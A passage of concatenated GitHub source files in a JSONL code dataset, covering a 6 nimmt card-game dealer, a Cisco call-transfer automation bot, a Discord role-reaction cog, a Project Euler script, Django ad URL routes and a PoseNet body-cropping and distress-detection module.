False)\n","repo_name":"RafailSkoulos17/web_data_management_group_9","sub_path":"postgres_scripts/userapp/user_app.py","file_name":"user_app.py","file_ext":"py","file_size_in_byte":4769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14396811340","text":"#! /usr/bin/env python3\n\nimport random\nimport sys\nimport copy\n\nclass Dealer(object):\n def __init__(self,players_input):\n self.__NUM_HAND = 10 # 初期手札の枚数\n self.__NUM_FIELD = 4 # 場の列の数\n self.__NUM_MAX_COLUMN = 5 # 場の列における最大数\n self.__MAX_CARD = 104 # カードの最大の数\n self.__players = players_input # プレイヤーのインスタンスのリスト\n self.__num_players = len(self.__players) # プレイヤー数\n self.__num_cards = self.__NUM_HAND*self.__num_players # プレーヤー数 x 手札\n all_cards = random.sample(\n range(1,self.__MAX_CARD+1),\n self.__num_cards+self.__NUM_FIELD\n ) # 全カード\n self.__each_hands = [\n copy.deepcopy(all_cards[i*self.__NUM_HAND:(i+1)*self.__NUM_HAND]) \n for i in range(self.__num_players)\n ] # 各自の手札\n self.__field = [\n copy.deepcopy([all_cards[self.__num_cards+i]])\n for i in range(self.__NUM_FIELD)\n ] # 場のカード\n self.__earned_cards = [\n [] for i in range(self.__num_players)\n ] # 各自の獲得カード\n all_cards.clear()\n for i in range(self.__num_players):\n _player = self.__players[i]\n _player.get_know_dealer(self) # ディーラーのインスタンスのお知らせ\n _player.get_hand(copy.deepcopy(self.__each_hands[i])) # カードを分配\n\n # player accessible values #\n @property\n def num_hand(self):\n return self.__NUM_HAND\n @property\n def num_field(self):\n return self.__NUM_FIELD\n @property\n def max_card(self):\n return self.__MAX_CARD\n @property\n def num_max_column(self):\n return self.__NUM_MAX_COLUMN\n @property\n def num_players(self):\n return self.__num_players\n @property\n def field(self):\n return self.__field\n @property\n def played_cards(self):\n return self.__played_cards\n @property\n def score(self):\n return [self.__calc_score(self.__earned_cards[i])\n for i in range(self.__num_players)\n ]\n\n # 出されたカードを受け取るメソッド\n def receive_cards(self):\n self.__played_cards = [\n player.put_card() for player in self.__players\n ]\n for i in range(self.__num_players):\n if self.__played_cards[i] not in self.__each_hands[i]: # エラー処理\n print(\"ERROR: You do NOT have the card:\" \n + str(self.__played_cards[i]) + \"!\"\n )\n sys.exit(1)\n self.__each_hands[i].remove(self.__played_cards[i])\n\n # 出されたカードをプレイヤーに知らせるメソッド\n def open_cards(self):\n for player in self.__players:\n if hasattr(player,\"get_played_cards\"):\n player.get_played_cards(self.__played_cards)\n\n # 出されたカードを場に並べ、6 枚目を置いた人にはカードを加算するメソッド\n def line_up_cards(self):\n self.__line_up_cards_recursive(copy.deepcopy(self.__played_cards))\n\n # line_up_cards のコアの部分\n def __line_up_cards_recursive(self,rest_cards): \n _most_right_field = [\n max(self.__field[i]) for i in range(self.__NUM_FIELD)\n ]\n _min_field = min(_most_right_field)\n _min_rest_cards = min(rest_cards)\n _min_player = self.__played_cards.index(_min_rest_cards)\n if _min_field > _min_rest_cards: # Field のカードよりも小さいカードが出されたとき\n _replace_column = self.__players[_min_player].taking_column() # player にどの列を選択するか訊く\n if _replace_column not in range(self.__NUM_FIELD): # エラー処理\n print(\"ERROR: You have to choose 0 or 1 or 2 or 3!\")\n sys.exit(1)\n for i in self.__field[_replace_column]:\n self.__earned_cards[_min_player].append(i)\n self.__field[_replace_column] = [_min_rest_cards]\n rest_cards.remove(_min_rest_cards)\n else: # 小さいカードから順に場にカードを並べる\n for i in sorted(_most_right_field,reverse=True):\n if _min_rest_cards > i:\n _column = _most_right_field.index(i)\n self.__field[_column].append(_min_rest_cards)\n rest_cards.remove(_min_rest_cards)\n # 1 列に self.__NUM_MAX_COLUMN (=5) 枚より多く置いたとき\n if len(self.__field[_column]) > self.__NUM_MAX_COLUMN:\n for j in range(self.__NUM_MAX_COLUMN):\n self.__earned_cards[_min_player].append(\n self.__field[_column].pop(0)\n )\n break\n if len(rest_cards) > 0: # 出されたカード (rest_cards) が全部処理されるまで再帰的に実行\n self.__line_up_cards_recursive(rest_cards)\n\n def print_score(self): # スコアの表示\n _score = [\n self.__calc_score(_earned_cards)\n for _earned_cards in self.__earned_cards\n ]\n print(\"score:\\n\",_score)\n\n def __calc_score(self,cards): # スコアの計算のためのサブメソッド\n _sum = 0\n for i in cards:\n if self.__bool_same_digit(i):\n if i % 5 == 0:\n _sum += 7\n else:\n _sum += 5\n elif i % 10 == 0:\n _sum += 3\n elif i % 5 == 0:\n _sum += 2\n else:\n _sum += 1\n return _sum\n def __bool_same_digit(self,num):\n if int(num/10) == 0:\n return False\n else:\n _1st_digit = int(num%10)\n while True:\n num = int(num/10)\n if num == 0:\n break\n if _1st_digit != int(num%10):\n return False\n return True\n\n def print_field(self):\n print(\"field:\")\n for i in range(self.__NUM_FIELD):\n print(self.__field[i])\n\n def print_played_cards(self):\n print(\"played Cards:\\n\",self.__played_cards)\n\n### 基本 Player クラス (みんなこれを使えば良い) ###\nclass Player(object):\n ### 必須メソッド (4 つ) ###\n def get_know_dealer(self,dealer_input): # ディーラーのインスタンスを得る\n self.dealer = dealer_input\n def get_hand(self,my_cards_input): # ディーラー側で呼んで、手札を得る\n self.my_cards = my_cards_input\n def put_card(self): # ディーラー側で呼んで、どのカードを出すか知らせる\n return self.my_cards.pop(0)\n def taking_column(self): # 一番小さい数を出したときにディーラー側で呼んで、どの列を引き取るか知らせる\n return 0\n def get_played_cards(self,dealer_input):\n self.played_cards = dealer_input\n\n def get_field(self): # 場の状況を得る\n self.field = self.dealer.field\n","repo_name":"progSeminarG/nimmt","sub_path":"nimmt_Dealer.py","file_name":"nimmt_Dealer.py","file_ext":"py","file_size_in_byte":7338,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26535250731","text":"from functions import *\nimport cv2\nimport win32gui, win32con, win32api\nimport numpy as np\n\nCALL_NUMBER = '10645'\n\nwhile True:\n try:\n inCall = detect_updating_screen('templates/bIncoming.PNG', \"Cisco IP Communicator\")\n if inCall != 0:\n print(\"Incomming call\")\n bCall = get_object_coord('templates/bAnswer.png', \"Cisco IP Communicator\")\n if bCall != 0:\n click(bCall[0], bCall[1])\n time.sleep(0.5)\n bTransferAgent = detect_updating_screen('templates/bTransferAgent.PNG', \"Cisco Agent Desktop\")\n if bTransferAgent != 0:\n pyautogui.click(bTransferAgent[0], bTransferAgent[1])\n time.sleep(0.5)\n bDigits = getNumbers(\"Передать вызов\")\n for i in CALL_NUMBER:\n click(bDigits[int(i)][0], bDigits[int(i)][1])\n time.sleep(0.5)\n baTransfer = get_object_coord('templates/baTransfer.PNG', \"Передать вызов\")\n if baTransfer != 0:\n click(baTransfer[0], baTransfer[1])\n time.sleep(0.5)\n bTransfer = detect_updating_screen('templates/bTransfer.PNG', \"Cisco IP Communicator\")\n if bTransfer != 0:\n click(bTransfer[0], bTransfer[1])\n print(\"Call was transfered\")\n else:\n time.sleep(1)\n except Exception as e:\n print(\"error: \", e)\n\n# cv2.imshow('output', d)\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n\n","repo_name":"surru2/openCV-bot","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71248112167","text":"from discord.abc import GuildChannel\nfrom discord.ext import commands\nfrom discord import Embed, RawReactionActionEvent, RawBulkMessageDeleteEvent, RawMessageDeleteEvent, NotFound, \\\n InvalidArgument, HTTPException, TextChannel, Forbidden, Role, Message\nfrom discord.ext.commands import BadArgument\nfrom discord_slash import cog_ext, SlashContext, SlashCommandOptionType\nfrom discord_slash.utils import manage_commands\n\nfrom administrator import db, slash\nfrom administrator.check import is_enabled, guild_only, has_permissions\nfrom administrator.logger import logger\nfrom administrator.utils import event_is_enabled, get_message_by_url\n\nextension_name = \"rorec\"\nlogger = logger.getChild(extension_name)\n\n\nclass RoRec(commands.Cog):\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n slash.get_cog_commands(self)\n\n def description(self):\n return \"Create role-reaction message to give role from a reaction add\"\n\n @staticmethod\n async def get_message(session: db.Session, ctx: SlashContext, url: str) -> db.RoRec:\n m = session.query(db.RoRec).filter(db.RoRec.message == (await get_message_by_url(ctx, url)).id and\n db.RoRec.guild == ctx.guild.id).first()\n if not m:\n raise BadArgument()\n else:\n return m\n\n async def try_emoji(self, msg: Message, emoji: str):\n try:\n await msg.add_reaction(emoji)\n except (HTTPException, NotFound, InvalidArgument):\n raise BadArgument()\n else:\n await (await msg.channel.fetch_message(msg.id)).remove_reaction(emoji, self.bot.user)\n\n @cog_ext.cog_subcommand(base=\"rorec\", name=\"new\",\n description=\"Create a new role-reaction message on the mentioned channel\",\n options=[\n manage_commands.create_option(\"title\", \"The title\",\n SlashCommandOptionType.STRING, True),\n manage_commands.create_option(\"channel\", \"The target channel\",\n SlashCommandOptionType.CHANNEL, True),\n manage_commands.create_option(\"description\", \"The description\",\n SlashCommandOptionType.STRING, False),\n manage_commands.create_option(\"one\", \"If only one role is packable\",\n SlashCommandOptionType.BOOLEAN, False)\n ])\n @is_enabled()\n @guild_only()\n @has_permissions(manage_roles=True)\n async def rorec_new(self, ctx: SlashContext, title: str, channel: GuildChannel, description: str = \"\",\n one: bool = False):\n if not isinstance(channel, TextChannel):\n raise BadArgument()\n\n embed = Embed(title=title, description=description)\n embed.add_field(name=\"Roles\", value=\"No role yet...\")\n message = await channel.send(embed=embed)\n r = db.RoRec(message.id, channel.id, ctx.guild.id, one)\n s = db.Session()\n s.add(r)\n s.commit()\n s.close()\n await ctx.send(content=\"\\U0001f44d\")\n\n @cog_ext.cog_subcommand(base=\"rorec\", name=\"edit\",\n description=\"Edit a role-reaction message title and description\",\n options=[\n manage_commands.create_option(\"url\", \"The message url\",\n SlashCommandOptionType.STRING, True),\n manage_commands.create_option(\"title\", \"The new title\",\n SlashCommandOptionType.STRING, True),\n manage_commands.create_option(\"description\", \"The new description\",\n SlashCommandOptionType.STRING, False)\n ])\n @is_enabled()\n @guild_only()\n @has_permissions(manage_roles=True)\n async def rorec_edit(self, ctx: SlashContext, url: str, title: str, description: str = \"\"):\n s = db.Session()\n m = await self.get_message(s, ctx, url)\n s.close()\n\n message = await ctx.guild.get_channel(m.channel).fetch_message(m.message)\n embed: Embed = message.embeds[0]\n embed.title = title\n embed.description = description\n await message.edit(embed=embed)\n await ctx.send(content=\"\\U0001f44d\")\n\n @cog_ext.cog_subcommand(base=\"rorec\", name=\"set\",\n description=\"Add/edit a emoji with linked roles\",\n options=[\n manage_commands.create_option(\"url\", \"The message url\",\n SlashCommandOptionType.STRING, True),\n manage_commands.create_option(\"emoji\", \"The emoji\",\n SlashCommandOptionType.STRING, True),\n manage_commands.create_option(\"role\", \"The role\",\n SlashCommandOptionType.ROLE, True)\n ])\n @is_enabled()\n @guild_only()\n @has_permissions(manage_roles=True)\n async def rorec_set(self, ctx: SlashContext, url: str, emoji: str, role: Role):\n await ctx.send(content=\"\\U000023f3\")\n s = db.Session()\n m = await self.get_message(s, ctx, url)\n\n await ctx.delete()\n msg = await ctx.channel.send(\"\\U000023f3\")\n await self.try_emoji(msg, emoji)\n\n data = m.get_data()\n data[emoji] = list(map(lambda x: x.id, [role]))\n m.set_data(data)\n await self.rorec_update(m)\n s.commit()\n s.close()\n await msg.edit(content=\"\\U0001f44d\")\n\n @cog_ext.cog_subcommand(base=\"rorec\", name=\"remove\",\n description=\"Remove a emoji of a role-reaction message\",\n options=[\n manage_commands.create_option(\"url\", \"The message url\",\n SlashCommandOptionType.STRING, True),\n manage_commands.create_option(\"emoji\", \"The emoji\",\n SlashCommandOptionType.STRING, True)\n ])\n @is_enabled()\n @guild_only()\n @has_permissions(manage_roles=True)\n async def rorec_remove(self, ctx: SlashContext, url: str, emoji: str):\n await ctx.send(content=\"\\U000023f3\")\n s = db.Session()\n m = await self.get_message(s, ctx, url)\n\n await ctx.delete()\n msg = await ctx.channel.send(\"\\U000023f3\")\n await self.try_emoji(msg, emoji)\n\n data = m.get_data()\n if emoji not in data:\n raise BadArgument()\n del data[emoji]\n m.set_data(data)\n\n await self.rorec_update(m)\n s.commit()\n s.close()\n await msg.edit(\"\\U0001f44d\")\n\n @cog_ext.cog_subcommand(base=\"rorec\", name=\"reload\",\n description=\"Reload the message and the reactions\",\n options=[manage_commands.create_option(\"url\", \"The message url\",\n SlashCommandOptionType.STRING, True)])\n @is_enabled()\n @guild_only()\n @has_permissions(manage_roles=True)\n async def rorec_reload(self, ctx: SlashContext, url: str):\n s = db.Session()\n m = await self.get_message(s, ctx, url)\n\n await self.rorec_update(m)\n s.close()\n await ctx.send(content=\"\\U0001f44d\")\n\n @cog_ext.cog_subcommand(base=\"rorec\", name=\"delete\",\n description=\"Remove a role-reaction message\",\n options=[manage_commands.create_option(\"url\", \"The message link\",\n SlashCommandOptionType.STRING, True)])\n @is_enabled()\n @guild_only()\n @has_permissions(manage_roles=True)\n async def rorec_delete(self, ctx: SlashContext, url: str):\n msg = await get_message_by_url(ctx, url)\n s = db.Session()\n await self.get_message(s, ctx, url)\n s.close()\n await msg.delete()\n await ctx.send(content=\"\\U0001f44d\")\n\n async def rorec_update(self, m: db.RoRec):\n channel = self.bot.get_channel(m.channel)\n if not channel:\n pass\n message = await channel.fetch_message(m.message)\n if not message:\n pass\n embed: Embed = message.embeds[0]\n name = embed.fields[0].name\n embed.remove_field(0)\n value = \"\"\n data = m.get_data()\n await message.clear_reactions()\n for d in data:\n value += f\"{d}: \"\n value += \", \".join(map(lambda x: self.bot.get_guild(m.guild).get_role(x).mention, data[d]))\n value += \"\\n\"\n await message.add_reaction(d)\n if not value:\n value = \"No role yet...\"\n embed.add_field(name=name, value=value)\n await message.edit(embed=embed)\n\n @commands.Cog.listener()\n async def on_raw_message_delete(self, message: RawMessageDeleteEvent):\n s = db.Session()\n r = s.query(db.RoRec).filter(db.RoRec.message == message.message_id).first()\n if r:\n s.delete(r)\n s.commit()\n s.close()\n\n @commands.Cog.listener()\n async def on_raw_bulk_message_delete(self, messages: RawBulkMessageDeleteEvent):\n s = db.Session()\n for id in messages.message_ids:\n r = s.query(db.RoRec).filter(db.RoRec.message == id).first()\n if r:\n s.delete(r)\n s.commit()\n s.close()\n\n @commands.Cog.listener()\n async def on_guild_channel_delete(self, channel: GuildChannel):\n if isinstance(channel, TextChannel):\n s = db.Session()\n for r in s.query(db.RoRec).filter(db.RoRec.channel == channel.id).all():\n s.delete(r)\n s.commit()\n s.close()\n\n @commands.Cog.listener()\n async def on_raw_reaction_add(self, payload: RawReactionActionEvent):\n s = db.Session()\n if payload.guild_id and not event_is_enabled(self.qualified_name, payload.guild_id, s):\n return\n m = s.query(db.RoRec).filter(db.RoRec.message == payload.message_id).first()\n s.close()\n if m and payload.member.id != self.bot.user.id:\n data = m.get_data()\n emoji = str(payload.emoji)\n if emoji in data:\n guild = self.bot.get_guild(payload.guild_id)\n roles = [guild.get_role(r) for r in data[emoji]]\n add = False\n\n if m.one:\n del data[emoji]\n remove_roles = []\n [remove_roles.extend(map(lambda x: guild.get_role(x), data[e])) for e in data]\n await payload.member.remove_roles(*remove_roles, reason=\"Only one role-reaction message\")\n\n for r in filter(lambda x: x not in payload.member.roles, roles):\n try:\n await payload.member.add_roles(r, reason=\"Role-reaction message\")\n add = True\n except Forbidden:\n await payload.member.send(\"I don't have the permission to add a role to you !\")\n\n if not add:\n try:\n await payload.member.remove_roles(*roles, reason=\"Role-reaction message\")\n except Forbidden:\n await payload.member.send(\"I don't have the permission to remove one of your roles !\")\n\n await (await self.bot.get_channel(payload.channel_id).fetch_message(payload.message_id))\\\n .remove_reaction(payload.emoji, payload.member)\n\n\ndef setup(bot):\n logger.info(f\"Loading...\")\n try:\n bot.add_cog(RoRec(bot))\n except Exception as e:\n logger.error(f\"Error loading: {e}\")\n else:\n logger.info(f\"Load successful\")\n\n\ndef teardown(bot):\n logger.info(f\"Unloading...\")\n try:\n bot.remove_cog(\"RoRec\")\n except Exception as e:\n logger.error(f\"Error unloading: {e}\")\n else:\n logger.info(f\"Unload successful\")\n","repo_name":"flifloo/Administrator-py","sub_path":"extensions/rorec.py","file_name":"rorec.py","file_ext":"py","file_size_in_byte":12586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39728379980","text":"#!/usr/bin/env python3\n#\n#euler145 / how many reversible numbers are there below one-billion? \ndef isnotreversible(n):\n s=str(n)\n r=s[::-1]\n q=int(s)+int(r)\n for j in str(q):\n if j not in ('1','3','5','7','9'):\n return True\n if s[0]!='0'and r[0]!='0':\n return False\n else:\n return True\n\nseuil=10**9\nrev=0\nfor i in range(1,seuil):\n if isnotreversible(i)==False:\n rev+=1\n\nprint(rev, i)\n \n\n","repo_name":"allagonne/Euler_project","sub_path":"euler145bis.py","file_name":"euler145bis.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35414873475","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import url\n\nfrom ad.views import *\n\nurlpatterns = [\n url(r'^get_ad_policy/$', get_ad_policy_view, name=\"get_ad_policy\"),\n url(r'^get_gold_config/$', get_gold_config_view, name=\"get_gold_config\"),\n url(r'^get_shield_config/$', get_shield_config_view, name=\"get_shield_config\"),\n url(r'^need_shield/$', need_shield_view, name=\"need_shield\"),\n url(r'^get_exchange_rate/$', get_exchange_rate_view, name=\"get_exchange_rate\"),\n url(r'^get_reward_cycle/$', get_reward_cycle_view, name=\"get_reward_cycle\"),\n url(r'^get_reward_cycle_count/$', get_reward_cycle_count_view, name=\"get_reward_cycle_count\"),\n url(r'^get_reward_condition/$', get_reward_condition_view, name=\"get_reward_condition\"),\n\n url(r'^get_ad_config/$', get_ad_config_view, name=\"get_ad_config_view\")\n]\n","repo_name":"echoturing/make_money","sub_path":"ad/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72366679529","text":"import posenet\nimport math\nimport numpy as np\nimport cv2\nimport custom\n\n\n# Get the coordinate that describe the torso\ndef get_info_skeleton(pose_id, keypoint_scores, keypoint_coords, part_names):\n total_info = dict()\n for ki, (score, coord) in enumerate(zip(keypoint_scores[pose_id, :], keypoint_coords[pose_id, :, :])):\n for part_name in part_names:\n if posenet.PART_NAMES[ki] == part_name:\n total_info[part_name] = dict()\n total_info[part_name]['x'] = coord[1]\n total_info[part_name]['y'] = coord[0]\n total_info[part_name]['score'] = score\n return total_info\n\n\n# Get the pose id of the skeleton which is the most centered on the picture\ndef get_pose_id_closest_to_center(keypoint_scores, keypoint_coords, window_height, window_width):\n nb_pose = len(keypoint_scores)\n list_center_gravity = [[0 for x in range(2)] for y in range(nb_pose)]\n for pose_id in range(nb_pose):\n for ki, (score, coord) in enumerate(zip(keypoint_scores[pose_id, :], keypoint_coords[pose_id, :, :])):\n list_center_gravity[pose_id][1] = np.average(coord[1])\n list_center_gravity[pose_id][0] = np.average(coord[0])\n\n x_center = window_width / 2\n y_center = window_height / 2\n list_dist_center = np.zeros(nb_pose)\n for pose_id in range(nb_pose):\n list_dist_center[pose_id] = \\\n np.power(list_center_gravity[pose_id][1] - x_center, 2) + \\\n np.power(list_center_gravity[pose_id][0] - y_center, 2)\n\n return np.argmin(list_dist_center)\n\n\n# Create a square out of the different coordinate\ndef create_square(xmin, xmax, ymin, ymax, scale):\n square = [int(xmin),\n int(ymin),\n int(xmax - xmin),\n int(ymax - ymin)]\n square[0] -= int((square[2] * scale - square[2]) / 2)\n square[1] -= int((square[3] * scale - square[3]) / 2)\n square[2] = int(square[2] * scale)\n square[3] = int(square[3] * scale)\n\n return square\n\n\n# Create and crop the image only if the square is valid\ndef crop_image(square, image):\n cropped_image = image\n if square[2] > 0 and square[3] > 0:\n cropped_image = image[\n square[1]: square[1] + square[3],\n square[0]: square[0] + square[2]]\n\n return cropped_image\n\n\n# get the height of the face based on the eyes\ndef get_height_face(x_left_eye, x_right_eye):\n distance_eyes = x_left_eye - x_right_eye\n height_face = math.pi * distance_eyes\n\n return height_face\n\n\n# Crop the body from a posenet skeleton\ndef get_body(pose_id, keypoint_scores, keypoint_coords, image):\n parts_names = ['leftShoulder', 'rightShoulder', 'leftHip', 'rightHip']\n\n parts_info = get_info_skeleton(pose_id, keypoint_scores, keypoint_coords, parts_names)\n\n x_min = min(parts_info['leftShoulder']['x'], parts_info['rightShoulder']['x'],\n parts_info['leftHip']['x'], parts_info['rightHip']['x'])\n x_max = max(parts_info['leftShoulder']['x'], parts_info['rightShoulder']['x'],\n parts_info['leftHip']['x'], parts_info['rightHip']['x'])\n y_min = min(parts_info['leftShoulder']['y'], parts_info['rightShoulder']['y'],\n parts_info['leftHip']['y'], parts_info['rightHip']['y'])\n y_max = max(parts_info['leftShoulder']['y'], parts_info['rightShoulder']['y'],\n parts_info['leftHip']['y'], parts_info['rightHip']['y'])\n\n square = create_square(x_min, x_max, y_min, y_max, 1.3)\n\n return crop_image(square, image)\n\n\n# Crop the face from a posenet skeleton\ndef get_face(pose_id, keypoint_scores, keypoint_coords, image):\n parts_names = ['leftEar', 'rightEar', 'leftEye', 'rightEye']\n\n parts_info = get_info_skeleton(pose_id, keypoint_scores, keypoint_coords, parts_names)\n\n x_min = parts_info['rightEar']['x']\n x_max = parts_info['leftEar']['x']\n y_min = parts_info['leftEye']['y'] - get_height_face(parts_info['leftEye']['x'], parts_info['rightEye']['x']) / 2\n y_max = parts_info['leftEye']['y'] + get_height_face(parts_info['leftEye']['x'], parts_info['rightEye']['x']) / 2\n\n square = create_square(x_min, x_max, y_min, y_max, scale=1)\n\n return crop_image(square, image)\n\n\n# Crop the forehead from a posenet skeleton\ndef get_forehead(pose_id, keypoint_scores, keypoint_coords, image):\n parts_names = ['leftEye', 'rightEye']\n parts_info = get_info_skeleton(pose_id, keypoint_scores, keypoint_coords, parts_names)\n\n face_height = get_height_face(parts_info['leftEye']['x'], parts_info['rightEye']['x'])\n\n top_forehead = parts_info['leftEye']['y'] - face_height / 2\n bottom_forehead = max(parts_info['rightEye']['y'], parts_info['leftEye']['y'])\n y_min = top_forehead + abs(bottom_forehead - top_forehead)/2\n y_max = bottom_forehead - abs(bottom_forehead - top_forehead)/3\n x_min = parts_info['rightEye']['x']\n x_max = parts_info['leftEye']['x']\n square = create_square(x_min, x_max, y_min, y_max, scale=1)\n return crop_image(square, image)\n\n\n# Crop the full person from a posenet skeleton\ndef get_person(pose_id, keypoint_scores, keypoint_coords, image):\n parts_names = ['nose', 'leftEye', 'rightEye', 'leftEar', 'rightEar', 'leftShoulder', 'rightShoulder',\n 'leftElbow', 'rightElbow', 'leftWrist', 'rightWrist', 'leftHip', 'rightHip', 'leftKnee',\n 'rightKnee', 'leftAnkle', 'rightAnkle']\n\n parts_info = get_info_skeleton(pose_id, keypoint_scores, keypoint_coords, parts_names)\n\n x_min = min(parts_info[:]['x'])\n x_max = max(parts_info[:]['x'])\n y_min = min(parts_info[:]['y'])\n y_max = max(parts_info[:]['y'])\n\n square = create_square(x_min, x_max, y_min, y_max, scale=1)\n\n return crop_image(square, image)\n\n\n# Crop the full person from a posenet skeleton\ndef get_mouth(pose_id, keypoint_scores, keypoint_coords, image):\n parts_names = ['nose', 'leftEar', 'rightEar', 'leftEye', 'rightEye']\n parts_info = get_info_skeleton(pose_id, keypoint_scores, keypoint_coords, parts_names)\n\n y_max = parts_info['leftEye']['y'] + get_height_face(parts_info['leftEye']['x'], parts_info['rightEye']['x']) / 2\n y_min = parts_info['nose']['y'] + np.abs(y_max - parts_info['nose']['y']) / 2\n x_min = parts_info['rightEar']['x'] + np.abs(parts_info['leftEar']['x'] - parts_info['rightEar']['x']) / 3\n x_max = parts_info['leftEar']['x'] - np.abs(parts_info['leftEar']['x'] - parts_info['rightEar']['x']) / 3\n square = create_square(x_min, x_max, y_min, y_max, scale=1)\n return crop_image(square, image)\n\n\n# Crop the left eye from a posenet skeleton\ndef get_left_eye(pose_id, keypoint_scores, keypoint_coords, image):\n parts_names = ['leftEye', 'rightEye']\n\n parts_info = get_info_skeleton(pose_id, keypoint_scores, keypoint_coords, parts_names)\n\n btw_eyes = parts_info['leftEye']['x']-parts_info['rightEye']['x']\n\n x_min = parts_info['leftEye']['x']-(btw_eyes*0.1)\n x_max = parts_info['leftEye']['x']+(btw_eyes*0.1)\n y_min = parts_info['leftEye']['y']-(btw_eyes*0.05)\n y_max = parts_info['leftEye']['y']+(btw_eyes*0.05)\n\n square = create_square(x_min, x_max, y_min, y_max, scale=1.5)\n\n return crop_image(square, image)\n\n\n# Crop the right eye from a posenet skeleton\ndef get_right_eye(pose_id, keypoint_scores, keypoint_coords, image):\n parts_names = ['leftEye', 'rightEye']\n\n parts_info = get_info_skeleton(pose_id, keypoint_scores, keypoint_coords, parts_names)\n\n btw_eyes = parts_info['leftEye']['x']-parts_info['rightEye']['x']\n\n x_min = parts_info['rightEye']['x']-(btw_eyes*0.1)\n x_max = parts_info['rightEye']['x']+(btw_eyes*0.1)\n y_min = parts_info['rightEye']['y']-(btw_eyes*0.05)\n y_max = parts_info['rightEye']['y']+(btw_eyes*0.05)\n\n square = create_square(x_min, x_max, y_min, y_max, scale=1.5)\n\n return crop_image(square, image)\n\n\n# Check if the hand is near the throat on a posenet skeleton\ndef is_hand_near_throat(pose_id, keypoint_scores, keypoint_coords):\n # Extract all information used for the detection\n parts_names = ['leftShoulder', 'rightShoulder', 'leftElbow', 'rightElbow', 'leftWrist', 'rightWrist']\n parts_info = get_info_skeleton(pose_id, keypoint_scores, keypoint_coords, parts_names)\n\n # get the best elbow and shoulder point\n if parts_info['leftShoulder']['score'] > parts_info['rightShoulder']['score']:\n y_shoulder = parts_info['leftShoulder']['y']\n else:\n y_shoulder = parts_info['rightShoulder']['y']\n\n if parts_info['leftElbow']['score'] > parts_info['rightElbow']['score']:\n y_elbow = parts_info['leftElbow']['y']\n else:\n y_elbow = parts_info['rightElbow']['y']\n\n # get the best valid wrist point\n if parts_info['leftWrist']['y'] < y_elbow and parts_info['rightWrist']['y'] < y_elbow:\n if parts_info['leftWrist']['score'] > parts_info['rightWrist']['score']:\n y_wrist = parts_info['leftWrist']['y']\n else:\n y_wrist = parts_info['rightWrist']['y']\n elif parts_info['leftWrist']['y'] < y_elbow:\n y_wrist = parts_info['leftWrist']['y']\n elif parts_info['rightWrist']['y'] < y_elbow:\n y_wrist = parts_info['rightWrist']['y']\n else:\n return False\n\n if np.abs(y_shoulder - y_wrist) > np.abs(y_elbow - y_wrist):\n return False\n\n return True\n\n\n# Check if the mouth is open based on a posenet skeleton\ndef is_mouth_open(pose_id, keypoint_scores, keypoint_coords, image):\n image_mouth = get_mouth(pose_id, keypoint_scores, keypoint_coords, image)\n\n hsv = cv2.cvtColor(image_mouth, cv2.COLOR_BGR2HSV)\n average_value = np.average(hsv[:, :, 2])\n\n image_face = get_face(pose_id, keypoint_scores, keypoint_coords, image)\n base_value = custom.image_treatment.get_average_value(image_face)\n\n if np.abs(base_value - average_value) > 15:\n return True\n else:\n return False\n\n\n# Check if one or more eyes are open\ndef are_eyes_open(pose_id, keypoint_scores, keypoint_coords, image):\n image_left_eye = custom.detection.get_left_eye(pose_id, keypoint_scores, keypoint_coords, image)\n image_right_eye = custom.detection.get_right_eye(pose_id, keypoint_scores, keypoint_coords, image)\n\n med = int(image_left_eye.shape[0]/2)\n\n hsvL = cv2.cvtColor(image_left_eye, cv2.COLOR_BGR2HSV)\n hsvR = cv2.cvtColor(image_right_eye, cv2.COLOR_BGR2HSV)\n hueL, satL, valL = cv2.split(hsvL)\n hueR, satR, valR = cv2.split(hsvR)\n whiteL = whiteR = 0\n\n for i in range(hueL.shape[1]):\n if hueL[med][i] > 40:\n whiteL = whiteL+1\n if hueR[med][i] > 40:\n whiteR = whiteR+1\n\n if whiteL > 1 or whiteR > 1:\n return True\n else:\n return False\n\n\n# Create a dictionary of symptoms\ndef create_symptoms_dict():\n symptoms = dict()\n symptoms[\"hand_near_throat\"] = 0.\n symptoms[\"eyes_close\"] = 0.\n symptoms[\"mouth_open\"] = 0.\n symptoms[\"laying_on_ground\"] = 0.\n symptoms[\"fast_cardiac_pace\"] = 0.\n symptoms[\"no_cardiac_pace\"] = 0.\n return symptoms\n\n\n# Get the diagnostic of a person based on his symptoms\n# Each symptoms should be a percentage\ndef get_diagnostics(symptoms):\n\t# No cardiac pace detection, so we don't do the cardiac diagnostic\n\t# We also don't take into account the fast and no cardiac pace symptoms\n diagnostic = dict()\n diagnostic[\"Etouffement\"] = \\\n (symptoms[\"hand_near_throat\"] + symptoms[\"mouth_open\"] + (1 - symptoms[\"eyes_close\"]) +\n + (1 - symptoms[\"laying_on_ground\"])) / 4\n #(symptoms[\"hand_near_throat\"] + symptoms[\"mouth_open\"] + (1 - symptoms[\"eyes_close\"]) +\n # symptoms[\"fast_cardiac_pace\"] + (1 - symptoms[\"laying_on_ground\"])) / 5\n\n diagnostic[\"Inconscient\"] = \\\n (symptoms[\"eyes_close\"] + symptoms[\"laying_on_ground\"]) / 2\n #(symptoms[\"eyes_close\"] + symptoms[\"laying_on_ground\"] +\n # (1 - symptoms[\"fast_cardiac_pace\"] + 1 - symptoms[\"no_cardiac_pace\"])) / 5\n\n #diagnostic[\"Arret_cardiaque\"] = \\\n # ((1 - symptoms[\"eyes_close\"]) + symptoms[\"laying_on_ground\"] + symptoms[\"no_cardiac_pace\"]) / 5\n\n # To differentiate these two, ask the user if the person is hurt\n #diagnostic[\"Malaise_cardiaque\"] = \\\n # ((1 